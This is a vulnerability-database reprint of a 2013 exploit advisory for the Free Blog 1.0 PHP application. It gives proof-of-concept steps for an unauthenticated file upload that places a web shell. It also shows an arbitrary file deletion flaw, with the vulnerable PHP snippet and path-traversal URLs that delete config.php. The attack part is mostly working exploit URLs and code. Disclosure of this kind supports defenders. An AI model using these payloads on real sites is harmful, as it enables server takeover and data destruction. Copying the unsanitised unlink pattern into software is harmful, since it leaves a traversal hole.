Lucene search
K

Free Blog 1.0 Multiple Vulnerabilities

🗓️ 09 Jan 2013 00:00:00Reported by cr4wl3rType 
zdt
 zdt
🔗 0day.today👁 14 Views

Free Blog 1.0 Multiple Vulnerabilities, Arbitrary File Upload and Deletio

Code
# Free Blog 1.0 Multiple Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Free_Blog.txt
# Software Link: http://blog.sdnex.com/
# Tested: Ubuntu 12.04.1 LTS
 
Proof of concept:
 
Arbitrary File Upload Vulnerability
 
   http://bastardlabs/blog_path/up.php
 
Shell will be available here
 
   http://bastardlabs/blog_path/log/images/shell.php
 
 
 
Arbitrary File Deletion Vulnerability
 
----------
49 <?php
50 if($_GET['del']){
51 $id=$_GET['del'];
52 unlink("./log/images/$id");
53 }
54 ?>
----------
 
   http://bastardlabs/blog_path/up.php?del=../../[file]
   http://bastardlabs/blog_path/up.php?del=../../config.php
 
------------------------------
My sweetheart
http://www.photoshow.com/watch/rx9IX5ZS

#  0day.today [2018-04-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation